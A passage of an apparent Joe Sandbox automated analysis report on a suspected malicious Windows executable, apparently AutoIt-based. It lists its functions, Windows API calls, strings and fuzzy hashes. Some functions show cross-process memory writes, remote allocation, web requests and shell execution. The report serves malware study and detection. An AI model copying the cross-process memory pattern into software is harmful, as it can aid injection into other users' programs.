                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                          • String ID:
                                                                          • API String ID: 4247068974-0
                                                                          • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                          • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                          • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                          • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                          Function 004624C5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 409COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 5$8$^
                                                                          • API String ID: 0-3622883839
                                                                          • Opcode ID: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                                          • Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
                                                                          • Opcode Fuzzy Hash: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                                          • Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
                                                                          Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: )$U$\
                                                                          • API String ID: 0-3705770531
                                                                          • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                          • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                          • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                          • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                          Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                          • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                          • CoUninitialize.OLE32 ref: 0046E53D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                          • String ID: .lnk
                                                                          • API String ID: 886957087-24824748
                                                                          • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                          • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                          • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                          • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                          Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                          • API String ID: 708495834-557222456
                                                                          • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                          • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                          • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                          • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                          Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                            • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                            • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                            • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                            • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                          • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                          • String ID: @
                                                                          • API String ID: 4150878124-2766056989
                                                                          • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                          • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                          • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                          • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                          Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \$]$h
                                                                          • API String ID: 4104443479-3262404753
                                                                          • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                          • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                          • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                          • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                          Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                          • String ID: <$@
                                                                          • API String ID: 2417854910-1426351568
                                                                          • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                          • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                          • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                          • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                          Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                          • String ID:
                                                                          • API String ID: 3705125965-3916222277
                                                                          • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                          • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                          • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                          • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                          Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                          • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                          • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$InfoItem
                                                                          • String ID: 0
                                                                          • API String ID: 135850232-4108050209
                                                                          • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                          • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                          • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                          • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                          Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long
                                                                          • String ID: SysTreeView32
                                                                          • API String ID: 847901565-1698111956
                                                                          • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                          • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                          • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                          • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                          Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                          • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                          • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AddressFreeLoadProc
                                                                          • String ID: AU3_GetPluginDetails
                                                                          • API String ID: 145871493-4132174516
                                                                          • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                          • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                          • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                          • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                          Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window
                                                                          • String ID: SysMonthCal32
                                                                          • API String ID: 2326795674-1439706946
                                                                          • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                          • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                          • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                          • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                          Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: DestroyWindow
                                                                          • String ID: msctls_updown32
                                                                          • API String ID: 3375834691-2298589950
                                                                          • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                          • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                          • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                          • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                          Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: $<
                                                                          • API String ID: 4104443479-428540627
                                                                          • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
